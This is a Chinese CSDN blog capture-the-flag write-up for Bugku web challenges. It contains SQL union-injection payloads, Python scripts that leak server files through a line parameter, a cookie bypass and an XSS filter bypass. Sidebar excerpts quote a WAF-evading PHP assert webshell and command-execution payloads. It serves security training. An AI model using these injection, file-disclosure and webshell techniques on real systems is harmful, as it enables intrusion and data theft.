bugkuCTF Writeup (Web)22-25

最新推荐文章于 2021-05-31 10:11:39 发布
最新推荐文章于 2021-05-31 10:11:39 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: CTF 文章标签: CTF Web XSS SQL Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/troublor/article/details/79170685
版权

成绩单

这里写图片描述
需要去爆数据库信息
但是发现后台应该是不管查询到多少条记录,只显示一条,所以为了显示爆出的信息,就不能让它查出正常的信息,所以
爆数据库名:-1' union select 1,database(),3,4#
爆表名:-1' union select 1,table_name,3,4 from information_schema.tables where table_schema='skctf_flag' #
爆字段名:-1' union select 1,column_name,3,4 from information_schema.columns where table_name='fl4g'#
取得flag:-1' union select 1,skctf_flag,3,4 from skctf_flag.fl4g#

Web6

这里写图片描述
看源码发现要post margin值,再看http响应头,发现有一个flag字段,是base64编码,于是解码提交
这里写图片描述
发现并不对,原来解码获得的仍然是base64编码这里写图片描述
再解码获得一串数字,直接提交仍然不对,还要post给服务器获取flag
手动post过去提示太慢了,这回要用脚本了(python3)

import requests
import base64

s = requests.Session()
r = s.get("http://120.24.86.145:8002/web6/")
head = r.headers['flag']
flag = base64.b64decode(head)
d = {
    "margin": base64.b64decode(str(flag).split(":")[1][1:-1])
}
print(head)
print(flag)
print(d)
r = s.post("http://120.24.86.145:8002/web6/", data=d)
print(r.text)

跑出来结果:
这里写图片描述

cookies欺骗??

这里写图片描述
点进来看url

http://120.24.86.145:8002/web11/index.php?line=&filename=a2V5cy50eHQ=

filename那里好像提交的是base64编码,解码后发现是keys.txt,去看keys.txt文件里面是乱码。
于是想到去提交index.php的base64编码,

http://120.24.86.145:8002/web11/index.php?line=&filename=aW5kZXgucGhw

仍然是一片空白
还有一个参数line没有用,估计是行号,试探性输入1,竟然显示了一行php代码
在输入2,又是一行,于是用脚本遍历得index.php代码(python3)

import requests
import base64

filename = base64.b64encode(bytes("index.php", "utf-8"))
line = 0
while line < 1000:
    url = "http://120.24.86.145:8002/web11/index.php?line=" + str(line) + "&filename=" + str(filename)[2:-1]
    r = requests.get(url)
    print(r.text)
    try:
        r.text.index("?>")
    except ValueError:
        line = line + 1
        continue
    else:
        break

获得源代码:

<?php
error_reporting(0);

$file = base64_decode(isset($_GET['filename']) ? $_GET['filename'] : "");

$line = isset($_GET['line']) ? intval($_GET['line']) : 0;

if ($file == '') header("location:index.php?line=&filename=a2V5cy50eHQ=");

$file_list = array(

    '0' => 'keys.txt',

    '1' => 'index.php',

);


if (isset($_COOKIE['margin']) && $_COOKIE['margin'] == 'margin') {

    $file_list[2] = 'keys.php';

}


if (in_array($file, $file_list)) {

    $fa = file($file);

    echo $fa[$line];

}

?>

根据代码的意思,要去看keys.php的内容,于是自己添加cookie绕过,然后参数提交keys.php的base64编码,查看源码,在注释里得flag

这里写图片描述

XSS

这里写图片描述
题目提示需要xss注入并且带有alert(_key_)代码,但是不知道注入点在哪里
根据惯例试了试get参数id,还真是在这里
于是尝试性注入<script>发现左右尖括号被过滤了,直接输出的html实体,那么就利用编码绕过,把左右尖括号替换成NATIVE编码\u003c和\u003e,注入:\u003cscript\u003ealert(_key_)\u003c/script\u003e,再查看源代码,就有结果了。
这里写图片描述
一时没有想通的是为什么那段js代码没有执行,<div id="s">标签内什么都没有

Troublor
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUGKU web22 assert注入漏洞
m0_49762339的博客
01-20 482
这道题和攻防世界那道/.git泄露差不多 题目给了提示: <?PHP $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) $poc_1=assert $_GET=s 因此只需要构造payload=?s=XXX即可 这里先尝试payload=?s=phpinfo();存在回显 因
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
bugku-web22
baidu_39504221的博客
12-21 544
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) explode("#",$poc); 将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5].
Bugku CTF web22Web
ChaoYue_miku的博客
03-05 477
0、打开网页,查看题目描述 送给大家一个过狗一句话: $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 这句话有什么含义呢,实际上就是代码审计 我们发现GET方法接受了一个变量s,而且也没有什么过滤,因此考虑直接读取文件目录 1、构造并上传payload:http://114.67.2
bugkuCTF---WEBwriteup
居小然的博客
03-31 467
1.web2第一题很简单,F12,直接出flag;2.文件上传测试原题链接:点击打开链接首先创建一个1.php.jpg。点击上传,同时使用Burp进行抓包,然后Ctrl+R,将php.jpg后面的.jpg去除,点击GO,即可出来flag3.计算机原题链接:点击打开链接打开网址输入结果,会发现无法完整的输入结果,F12修改长度限制,然后返回输入结果,即可获得flag;(tips:我用的是谷歌浏览器,...
Bugkuctf web writeup
k0sec的安全路
03-18 386
web2 writeup 访问http://123.206.87.240:8002/web2/ 一堆滑稽。。。 页面没有任何提示,查看一下源代码。点击鼠标右键,发现没有查看源码选项,正常情况下应该有。 猜测flag很可能在源代码中。 按F12: 很显然,flag KEY{Web-2-bugKssNNikls9100} 总结,查看源代码的几种方法: (1)F12 (2)Ctrl+U (3)在u...
bugkuctf解题-杂项
05-04
bugku writeup,杂项解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
bugku ctf misc wp.pdf
07-05
根据所提供的文件内容,我们可以得知,这是一个针对“bugku ctf misc wp.pdf”文件的CTF(Capture The Flag)比赛中的misc(杂项)类别题目的write-up(解答过程记录)。Misc类别通常包含各种非传统类型的题目,要求...
Codefest'2019 CTF writeup-b64_c3VuJTIwYm95.docx
11-29
Codefest'2019 CTF writeup 是一篇关于网络安全竞赛的总结,主要涉及的是在Codefest'19夺旗比赛中的几个挑战解决方案。CTF(Capture The Flag)是一种流行的安全竞赛,参赛者通过解决各种安全相关的谜题来获取“旗帜...
D3CTF2022-官方WriteUp1
08-03
本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User-Defined Functions(UDF)...
Bugku CTF Web(1-16) writeup
KRDecad3的博客
05-28 2693
Bugku CTF Web writeup 0x01.web2 右键查看元素,flag在&amp;amp;lt;body&amp;amp;gt;的注释中。 0x02.文件上传测试 上传PHP文件才能得到flag,但是只允许上传图片。 方法一:可以先上传图片文件,利用burp抓包,更改文件扩展名为php,即可得到flag。 方法二:%00截断,先上传图片文件,利用burp抓包,在文件名后面添加“%00.php”...
bugkuCTF Writeup (Web)1-9
Troublor的博客
01-23 1879
签到题 加群就行了,没卖什么关子:) Web2 花里胡哨的果断去看源码。。。 flag就在这了 文件上传测试 就按照上面说的,传一个php试试 提交后说:非图片文件 那就是既要是图片又要是php了 暂时不知道它是怎么判断是图片是php文件的,先试试再说 用Fiddler抓包 先改一改文件扩展名试一试吧 后缀改成jpg之后,仍然提示是非
Bugku CTF web25Web
ChaoYue_miku的博客
03-08 299
0、打开网页,查看题目描述 hint:SQL约束攻击 关于SQL约束攻击 ,这里有一个网址:基于约束的SQL攻击 1、分析进攻方法: 约束SQL注入的原理就是利用的约束条件,比如最长只能有15个字符的话,如果你输入的是abcdefghijklmnop(16位),那么保存在数据库里的就是abcdefghijklmno,那么别人用abcdefghijklmno注册一个用户名,就可以登陆。 还有一个可以利用的地方就是SQL在执行字符串处理的时候是会自动修剪掉尾部的空白符的,也就是说"abc"=="a
BugKu-web篇-web22
jiuyongpinyin的博客
05-31 112
web22 看了提示就知道需要以GET方式传入s参数,然后就试了一下system()看看能不能直接执行系统命令,发现可以,那这道题目就变得简单起来了,先查看当前目录下的文件 然后直接cat 这个文档 得到flag payload如下: http://114.67.246.176:11188?s=system('cat flaga15808abee46a1d5.txt') 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
bugku_writeup】web22 过狗一句话
kkza的博客
12-31 211
根据提示,这是一个一句话木马 构造payload 用蚁剑操作一下,发现没有用,会报错,这个时候考虑手动爆破 先了解几个函数 print_r() 把数组的键和值均打印出来 scandir() 扫描目录下的目录和文件,并返回数组 __FILE__ :当前目录 得到当前路径 直接访问txt文件 get it! ...
Bugku Web25
JJT
05-11 122
Bugku Web 25 提示是SQL约束攻击 解题过程   进入场景,看到是一个web管理系统,需要登陆,旁边可以看到注册的通道,先随意注册一个账号   推测只有管理员账户才会显示出flag,利用SQL约束攻击,SQL语句会将查询的字段后的空格格式化,随意我们注册的用户名为admin,此时再登录就可以得到flag SQL约束攻击   例如下面的代码中,输入的字符串末尾空格会被删除,admin与admin是一样的,这是因为在“字符串比较”期间,SQL会在内部使用空格来填充字符串,以便在比较之前使
Bugkuweb25
qq_46230755的博客
01-21 231
这题考的是约束攻击 在INSERT中,SQL会根据varchar(n)来限制字符串的最大长度。 1、如果字符串的长度大于“n”个字符的话,那么仅使用字符串的前“n”个字符. 2、在SQL中执行字符串处理时,字符串末尾的空格符将会被删除。 我们先尝试注册一个admin账号,发现不行 然后我们通过将admin后面,加入大量的数字和1,进行构造payload 账号 admin 1 密码 Aa1234 成功覆盖了
bugku-web25
baidu_39504221的博客
12-22 281
以admin/1234Ab注册,显示用户已存在 提示说sql约束攻击 现在表中有admin,假设字段是varchar(10) 那我们注册admin后面接超过字段长度的空格,mysql就会截取前面10位数据,从而达到再插入一个admin的效果 本地实验: 尝试插入 ...
BUGkuCTF
bigbigworld666的博客
06-26 1380
BUGkuCTF (一)WEB (1)web2 进入环境,首先看源码,在里面直接找到flag [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-97sg5F09-1593143273882)(file:///C:/Users/HP/AppData/Local/Temp/msohtmlclip1/01/clip_image002.gif)] (2)计算器 首先输入数字发现只能输入1个,所以F12去修改源码,将maxlength修改,然后填入正确数字即可出现flag [外链图片转存失
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值